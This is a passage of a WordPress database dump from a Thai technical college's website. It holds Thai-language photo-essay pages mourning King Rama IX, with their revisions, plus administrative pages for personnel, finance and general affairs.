ว่าวที่ถูกส่งเข้าประกวดจํานวนมากถูกประดับด้วยพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ ๙ อย่างไม่ได้นัดหมาย “เรารักพระองค์ท่านมาก” ผู้ประกวดรายหนึ่งกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4550\" src=\"/wp-content/uploads/2018/11/15-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กลุ่มคนไม่มีสถานะทางทะเบียนบ้านตามุย อํา เภอโขงเจียม จังหวัดอุบลราชธานี ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนเพื่อแสดงความระลึกถึงในหลวงรัชกาลที่ 9 ณ ริมฝั่งแม่นํ้าโขง “เพิ่นคือพ่อเฮาแท้ๆ ทุกมื้อนี่เหลียวเบิ่งอีเกิ้งบ่แม่นแม่ใหญ่ตํา ข้าว คือเก่าแล่ว เห็นแต่หน้าในหลวง” (ท่านคือพ่อของเราแท้ๆ ทุกวันนี้มองดวงจันทร์ไม่ได้เห็นภาพแม่ใหญ่ตํา ข้าว เหมือนก่อน เห็นแต่หน้าในหลวง) ชาวไทยริมโขงเล่าทั้งนํ้าตา</p>\r\n<img class=\"aligncenter size-large wp-image-4551\" src=\"/wp-content/uploads/2018/11/16-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนชาวโคราชรอร่วมงานถวายสักการะในหลวงรัชกาลที่ 9 ณ ลานย่าโมท่ามกลางสายฝน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ดีใจหล๊ายหลายจ้า สิเอาไปไว้เฮือนว่าหนูคิดฮอดในหลวงจ้า”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4552\" src=\"/wp-content/uploads/2018/11/35-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กหญิงพรนภา พันโนพัด วัย 11 ขวบ เล่าถึงพระบรมฉายาลักษณ์ ที่เธอเก็บได้ระหว่างคุ้ยขยะกองมหึมาภายหลังการสวรรคตเพียงไม่กี่วัน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เจดีย์เสด็จฟ้า สถิตไทย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4553\" src=\"/wp-content/uploads/2018/11/36-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ตั้งอยู่ภายในมหาวิทยาลัยขอนแก่น เจดีย์นี้มีความสูงเท่าตึก 5 ชั้น และประดับประดาไปด้วยพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 จํานวน 10 ,086 ภาพ ที่ชาวขอนแก่นนํามาติดไว้</p>\r\n<img class=\"aligncenter size-large wp-image-4554\" src=\"/wp-content/uploads/2018/11/51-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วงออร์เคสตรา นําโดยวาทยกรสมเถา สุจริตกุล บรรเลงเพลงสรรเสริญพระบารมี ณ ลานย่าโม จังหวัดนครราชสีมา ท่ามกลางประชาชนนับแสนที่มาร่วมร้องเพลงและจุดเทียนแสดงความอาลัย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4555\" src=\"/wp-content/uploads/2018/11/52-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ลุงตี นะเรศรัมย์ ชาวบุรีรัมย์ ผู้นุ่งผ้าขาวม้านั่งสนทนากับในหลวงรัชกาลที่ 9 และสมเด็จพระเทพรัตนราชสุดา เจ้าฟ้ามหาจักรีสิรินธรรัฐสีมาคุณากรปิยชาติ สยามบรมราชกุมารีบนพื้นเมื่อ 37 ปี ที่แล้ว “สวดมนต์ภาวนาให้ในหลวงแทบทุกคืนตั้งแต่ทรงพระประชวร จนกระทั่งทราบข่าวการสวรรคต” ลุงตีกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4556\" src=\"/wp-content/uploads/2018/11/79-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สมยศ ด่านสันเที๊ยะ และชาวโคราช อุปสมบทถวายแด่ในหลวงรัชกาลที่ ๙ ท่ามกลางความปลื้มปิติของเหล่าญาติพี่น้อง “ดีใจครับ พอแม่บอก ผมก็ตัดสินใจทันทีเลย” สมยศเผยความรู้สึกต่อพิธีอุปสมบทครั้งสําคัญที่สุดในชีวิต</p>', 'ภาพถ่าย โดย เริงฤทธิ์ คงเมือง', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%96%e0%b9%88%e0%b8%b2%e0%b8%a2-%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b9%80%e0%b8%a3%e0%b8%b4%e0%b8%87%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c-%e0%b8%84%e0%b8%87', '', '', '2018-11-16 10:37:24', '2018-11-16 03:37:24', '', 0, 'http://www.technicrayong.ac.th/?page_id=4596', 0, 'page', '', 0),
(4597, 3, '2018-11-16 10:37:24', '2018-11-16 03:37:24', '<img class=\"aligncenter size-large wp-image-4548\" src=\"/wp-content/uploads/2018/11/10-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หมอลําทั่วอีสานรวมตัวกันเพื่อถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ จังหวัดขอนแก่น โดยทุกคนสวมเสื้อผ้าชุดหมอลําที่มีการคาดด้วยผ้าดํา และประดับเข็มกลัดตัวเลข ๙</p>\r\n<img class=\"aligncenter size-large wp-image-4549\" src=\"/wp-content/uploads/2018/11/13-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ในงานมหกรรมว่าวประจําปี พ.ศ. 25 60 จังหวัดบุรีรัมย์ ว่าวที่ถูกส่งเข้าประกวดจํานวนมากถูกประดับด้วยพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ ๙ อย่างไม่ได้นัดหมาย “เรารักพระองค์ท่านมาก” ผู้ประกวดรายหนึ่งกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4550\" src=\"/wp-content/uploads/2018/11/15-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กลุ่มคนไม่มีสถานะทางทะเบียนบ้านตามุย อํา เภอโขงเจียม จังหวัดอุบลราชธานี ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนเพื่อแสดงความระลึกถึงในหลวงรัชกาลที่ 9 ณ ริมฝั่งแม่นํ้าโขง “เพิ่นคือพ่อเฮาแท้ๆ ทุกมื้อนี่เหลียวเบิ่งอีเกิ้งบ่แม่นแม่ใหญ่ตํา ข้าว คือเก่าแล่ว เห็นแต่หน้าในหลวง” (ท่านคือพ่อของเราแท้ๆ ทุกวันนี้มองดวงจันทร์ไม่ได้เห็นภาพแม่ใหญ่ตํา ข้าว เหมือนก่อน เห็นแต่หน้าในหลวง) ชาวไทยริมโขงเล่าทั้งนํ้าตา</p>\r\n<img class=\"aligncenter size-large wp-image-4551\" src=\"/wp-content/uploads/2018/11/16-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนชาวโคราชรอร่วมงานถวายสักการะในหลวงรัชกาลที่ 9 ณ ลานย่าโมท่ามกลางสายฝน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ดีใจหล๊ายหลายจ้า สิเอาไปไว้เฮือนว่าหนูคิดฮอดในหลวงจ้า”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4552\" src=\"/wp-content/uploads/2018/11/35-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กหญิงพรนภา พันโนพัด วัย 11 ขวบ เล่าถึงพระบรมฉายาลักษณ์ ที่เธอเก็บได้ระหว่างคุ้ยขยะกองมหึมาภายหลังการสวรรคตเพียงไม่กี่วัน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เจดีย์เสด็จฟ้า สถิตไทย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4553\" src=\"/wp-content/uploads/2018/11/36-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ตั้งอยู่ภายในมหาวิทยาลัยขอนแก่น เจดีย์นี้มีความสูงเท่าตึก 5 ชั้น และประดับประดาไปด้วยพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 จํานวน 10 ,086 ภาพ ที่ชาวขอนแก่นนํามาติดไว้</p>\r\n<img class=\"aligncenter size-large wp-image-4554\" src=\"/wp-content/uploads/2018/11/51-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วงออร์เคสตรา นําโดยวาทยกรสมเถา สุจริตกุล บรรเลงเพลงสรรเสริญพระบารมี ณ ลานย่าโม จังหวัดนครราชสีมา ท่ามกลางประชาชนนับแสนที่มาร่วมร้องเพลงและจุดเทียนแสดงความอาลัย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4555\" src=\"/wp-content/uploads/2018/11/52-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ลุงตี นะเรศรัมย์ ชาวบุรีรัมย์ ผู้นุ่งผ้าขาวม้านั่งสนทนากับในหลวงรัชกาลที่ 9 และสมเด็จพระเทพรัตนราชสุดา เจ้าฟ้ามหาจักรีสิรินธรรัฐสีมาคุณากรปิยชาติ สยามบรมราชกุมารีบนพื้นเมื่อ 37 ปี ที่แล้ว “สวดมนต์ภาวนาให้ในหลวงแทบทุกคืนตั้งแต่ทรงพระประชวร จนกระทั่งทราบข่าวการสวรรคต” ลุงตีกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4556\" src=\"/wp-content/uploads/2018/11/79-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สมยศ ด่านสันเที๊ยะ และชาวโคราช อุปสมบทถวายแด่ในหลวงรัชกาลที่ ๙ ท่ามกลางความปลื้มปิติของเหล่าญาติพี่น้อง “ดีใจครับ พอแม่บอก ผมก็ตัดสินใจทันทีเลย” สมยศเผยความรู้สึกต่อพิธีอุปสมบทครั้งสําคัญที่สุดในชีวิต</p>', 'ภาพถ่าย โดย เริงฤทธิ์ คงเมือง', '', 'inherit', 'closed', 'closed', '', '4596-revision-v1', '', '', '2018-11-16 10:37:24', '2018-11-16 03:37:24', '', 4596, 'http://www.technicrayong.ac.th/4596-revision-v1/', 0, 'revision', '', 0),
(4598, 3, '2018-11-16 10:37:44', '2018-11-16 03:37:44', '<img class=\"aligncenter size-large wp-image-4548\" src=\"/wp-content/uploads/2018/11/10-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หมอลําทั่วอีสานรวมตัวกันเพื่อถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ จังหวัดขอนแก่น โดยทุกคนสวมเสื้อผ้าชุดหมอลําที่มีการคาดด้วยผ้าดํา และประดับเข็มกลัดตัวเลข ๙</p>\r\n<img class=\"aligncenter size-large wp-image-4549\" src=\"/wp-content/uploads/2018/11/13-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ในงานมหกรรมว่าวประจําปี พ.ศ. 25 60 จังหวัดบุรีรัมย์ ว่าวที่ถูกส่งเข้าประกวดจํานวนมากถูกประดับด้วยพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ ๙ อย่างไม่ได้นัดหมาย “เรารักพระองค์ท่านมาก” ผู้ประกวดรายหนึ่งกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4550\" src=\"/wp-content/uploads/2018/11/15-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กลุ่มคนไม่มีสถานะทางทะเบียนบ้านตามุย อํา เภอโขงเจียม จังหวัดอุบลราชธานี ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนเพื่อแสดงความระลึกถึงในหลวงรัชกาลที่ 9 ณ ริมฝั่งแม่นํ้าโขง “เพิ่นคือพ่อเฮาแท้ๆ ทุกมื้อนี่เหลียวเบิ่งอีเกิ้งบ่แม่นแม่ใหญ่ตํา ข้าว คือเก่าแล่ว เห็นแต่หน้าในหลวง” (ท่านคือพ่อของเราแท้ๆ ทุกวันนี้มองดวงจันทร์ไม่ได้เห็นภาพแม่ใหญ่ตํา ข้าว เหมือนก่อน เห็นแต่หน้าในหลวง) ชาวไทยริมโขงเล่าทั้งนํ้าตา</p>\r\n<img class=\"aligncenter size-large wp-image-4551\" src=\"/wp-content/uploads/2018/11/16-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนชาวโคราชรอร่วมงานถวายสักการะในหลวงรัชกาลที่ 9 ณ ลานย่าโมท่ามกลางสายฝน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ดีใจหล๊ายหลายจ้า สิเอาไปไว้เฮือนว่าหนูคิดฮอดในหลวงจ้า”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4552\" src=\"/wp-content/uploads/2018/11/35-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กหญิงพรนภา พันโนพัด วัย 11 ขวบ เล่าถึงพระบรมฉายาลักษณ์ ที่เธอเก็บได้ระหว่างคุ้ยขยะกองมหึมาภายหลังการสวรรคตเพียงไม่กี่วัน</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เจดีย์เสด็จฟ้า สถิตไทย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4553\" src=\"/wp-content/uploads/2018/11/36-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ตั้งอยู่ภายในมหาวิทยาลัยขอนแก่น เจดีย์นี้มีความสูงเท่าตึก 5 ชั้น และประดับประดาไปด้วยพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 จํานวน 10 ,086 ภาพ ที่ชาวขอนแก่นนํามาติดไว้</p>\r\n<img class=\"aligncenter size-large wp-image-4554\" src=\"/wp-content/uploads/2018/11/51-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วงออร์เคสตรา นําโดยวาทยกรสมเถา สุจริตกุล บรรเลงเพลงสรรเสริญพระบารมี ณ ลานย่าโม จังหวัดนครราชสีมา ท่ามกลางประชาชนนับแสนที่มาร่วมร้องเพลงและจุดเทียนแสดงความอาลัย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4555\" src=\"/wp-content/uploads/2018/11/52-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ลุงตี นะเรศรัมย์ ชาวบุรีรัมย์ ผู้นุ่งผ้าขาวม้านั่งสนทนากับในหลวงรัชกาลที่ 9 และสมเด็จพระเทพรัตนราชสุดา เจ้าฟ้ามหาจักรีสิรินธรรัฐสีมาคุณากรปิยชาติ สยามบรมราชกุมารีบนพื้นเมื่อ 37 ปี ที่แล้ว “สวดมนต์ภาวนาให้ในหลวงแทบทุกคืนตั้งแต่ทรงพระประชวร จนกระทั่งทราบข่าวการสวรรคต” ลุงตีกล่าว</p>\r\n<img class=\"aligncenter size-large wp-image-4556\" src=\"/wp-content/uploads/2018/11/79-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สมยศ ด่านสันเที๊ยะ และชาวโคราช อุปสมบทถวายแด่ในหลวงรัชกาลที่ ๙ ท่ามกลางความปลื้มปิติของเหล่าญาติพี่น้อง “ดีใจครับ พอแม่บอก ผมก็ตัดสินใจทันทีเลย” สมยศเผยความรู้สึกต่อพิธีอุปสมบทครั้งสําคัญที่สุดในชีวิต</p>', 'ภาพถ่าย โดย เริงฤทธิ์ คงเมือง', '', 'inherit', 'closed', 'closed', '', '4596-autosave-v1', '', '', '2018-11-16 10:37:44', '2018-11-16 03:37:44', '', 4596, 'http://www.technicrayong.ac.th/4596-autosave-v1/', 0, 'revision', '', 0),
(4599, 3, '2018-11-16 10:38:21', '2018-11-16 03:38:21', 'https://youtu.be/xrNi-56jrzQ\r\n\r\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-จันทร์กลาง-ก\"><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></a></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-เริงชัย-คงเม\"><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-เริงฤทธิ์-คง\"><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></a></h3>', '๑๐๐ วัน เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-16 10:38:21', '2018-11-16 03:38:21', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4600, 3, '2018-11-16 10:41:28', '2018-11-16 03:41:28', '', 'ทำเนียบผู้บริหาร', '', 'publish', 'closed', 'closed', '', '%e0%b8%97%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b8%9a%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=4600', 15, 'nav_menu_item', '', 0),
(4601, 3, '2018-11-16 14:06:48', '2018-11-16 07:06:48', '', '18-9-2561 9-43-33', '', 'inherit', 'closed', 'closed', '', '18-9-2561-9-43-33-2', '', '', '2018-11-16 14:06:48', '2018-11-16 07:06:48', '', 1512, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/18-9-2561-9-43-33.jpg', 0, 'attachment', 'image/jpeg', 0),
(4602, 3, '2018-11-16 14:07:03', '2018-11-16 07:07:03', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\n\n \n\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\n\n<img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-autosave-v1', '', '', '2018-11-16 14:07:03', '2018-11-16 07:07:03', '', 1512, 'http://www.technicrayong.ac.th/1512-autosave-v1/', 0, 'revision', '', 0),
(4603, 3, '2018-11-16 14:10:12', '2018-11-16 07:10:12', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4601\" src=\"/wp-content/uploads/2018/11/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-revision-v1', '', '', '2018-11-16 14:10:12', '2018-11-16 07:10:12', '', 1512, 'http://www.technicrayong.ac.th/1512-revision-v1/', 0, 'revision', '', 0),
(4604, 3, '2018-11-16 14:25:34', '2018-11-16 07:25:34', '', '16-11-2561 14-27-42', '', 'inherit', 'closed', 'closed', '', '16-11-2561-14-27-42', '', '', '2018-11-16 14:25:34', '2018-11-16 07:25:34', '', 1516, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg', 0, 'attachment', 'image/jpeg', 0),
(4605, 3, '2018-11-16 14:26:11', '2018-11-16 07:26:11', '<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\n\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\n\n<img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" />\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-autosave-v1', '', '', '2018-11-16 14:26:11', '2018-11-16 07:26:11', '', 1516, 'http://www.technicrayong.ac.th/1516-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4606, 3, '2018-11-16 14:26:15', '2018-11-16 07:26:15', '<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-11-16 14:26:15', '2018-11-16 07:26:15', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(4607, 3, '2018-11-16 14:29:20', '2018-11-16 07:29:20', '', '3151420245', '', 'inherit', 'closed', 'closed', '', '3151420245', '', '', '2018-11-16 14:29:20', '2018-11-16 07:29:20', '', 1536, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/3151420245.jpg', 0, 'attachment', 'image/jpeg', 0),
(4608, 3, '2018-11-16 14:29:34', '2018-11-16 07:29:34', '<img class=\"aligncenter size-full wp-image-1600\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" />\r\n\r\n<img class=\"aligncenter wp-image-1473 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"385\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" />', 'งานการเงิน', '', 'inherit', 'closed', 'closed', '', '1536-revision-v1', '', '', '2018-11-16 14:29:34', '2018-11-16 07:29:34', '', 1536, 'http://www.technicrayong.ac.th/1536-revision-v1/', 0, 'revision', '', 0),
